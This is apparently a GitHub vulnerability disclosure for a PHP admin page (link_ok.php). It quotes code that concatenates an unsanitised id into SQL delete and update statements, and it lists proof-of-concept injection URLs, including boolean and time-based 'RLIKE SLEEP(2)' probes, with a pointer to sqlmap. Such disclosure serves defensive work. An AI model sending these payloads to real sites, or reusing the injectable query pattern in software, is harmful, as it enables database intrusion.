-
Notifications
You must be signed in to change notification settings - Fork 0
/
bug_l
63 lines (53 loc) · 2.18 KB
/
bug_l
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
Build environment with PHP5.
--------------------------------
affected source code file: /admin/link/link_ok.php
--------------------------------
affected source code:
<?php
require_once '../../inc/const.php';
$act = $_GET['act'];
$id =getvar('id');
$name =getvar('name');
$url =getvar('url');
$content =getvar('content');
$state = getvar('state');
if($act=='add'){
$record = array(
'name' =>$name,
'url' =>$url,
'content' =>$content,
'addtime' =>date("y-m-d H-i-s"),
'state' =>$state
);
$id = $db->insert($GLOBALS[databasePrefix].'link',$record);
echo "<script>alert('添加成功!');window.location='link_manage.php';</script>";
}
if ($act=='mod'){
$record = array(
'name' =>$name,
'url' =>$url,
'content' =>$content,
'state' =>$state
);
$db->update($GLOBALS[databasePrefix].'link',$record,'id='.$id);
echo "<script>alert('修改成功!');window.location='link_manage.php';</script>";
}
if ($act=='del') {
//del_file($id);
$db->delete($GLOBALS[databasePrefix].'link',"id=".$id);
echo "<script>alert('删除成功!');window.location='link_manage.php';</script>";
}
?>
--------------------------------
affected reason:
We can see the $id parameter has not been safely processed. So, the SQL injection can be achieved by constructing SQL injection statements in /admin/link/link_ok.php
--------------------------------
affected executable:
After Signing in to the background in advance. Then we can use burpsuit to grab the following URL packets:
Like this:
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1'
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1 and 1=1
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1 and 1=2
http://xx.xx.com/admin/link/link_ok.php?act=del&id=1 RLIKE SLEEP(2)
And we can see the sql injection problems.
Then, we can use tools like sqlmap for more information.